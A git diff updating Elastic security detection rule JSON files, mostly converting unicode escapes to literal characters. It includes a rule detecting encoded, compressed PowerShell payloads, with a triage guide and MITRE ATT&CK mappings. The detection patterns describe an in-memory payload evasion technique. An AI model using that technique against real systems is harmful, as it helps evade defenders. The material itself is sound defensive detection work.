b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json index 4c18d4a462c..59c6f858a8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json index bfeb52f3f7e..8b68d805541 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json index cb594965fb2..5a05f5d61f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json index c4157c2c332..2642409fd33 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json index 34bf3078ba7..56960f8ec45 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json index 782b48880ba..b18c6d9fbdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json index fa4818d6a61..71f14a192ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json index 8a329b643fb..0fa3bd19753 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json index 099288d49b5..8497cdcea78 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json index da134ed54db..24f2656ff69 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json index e4182ce1e41..9823a7dc632 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json index 4ea48532f50..59e188c09ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json index 96c67e93a1d..14313027ba7 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json index 0a98e08eba5..86c971db9be 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json index 9c794a721a6..b56652bac58 100644 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json +++ b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json index d553a7e068f..ac84a075432 100644 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json +++ b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json index 8cf23755e14..ba69219cb63 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json index e29af6da136..99b53b24e75 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json index 5614cef983f..f7bba27a3e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json index 26ddec17222..97640d632c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json index e92def4449c..9ca2aa4ead7 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json index 6fbaab7dd1f..3bfd7c21691 100644 --- a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git 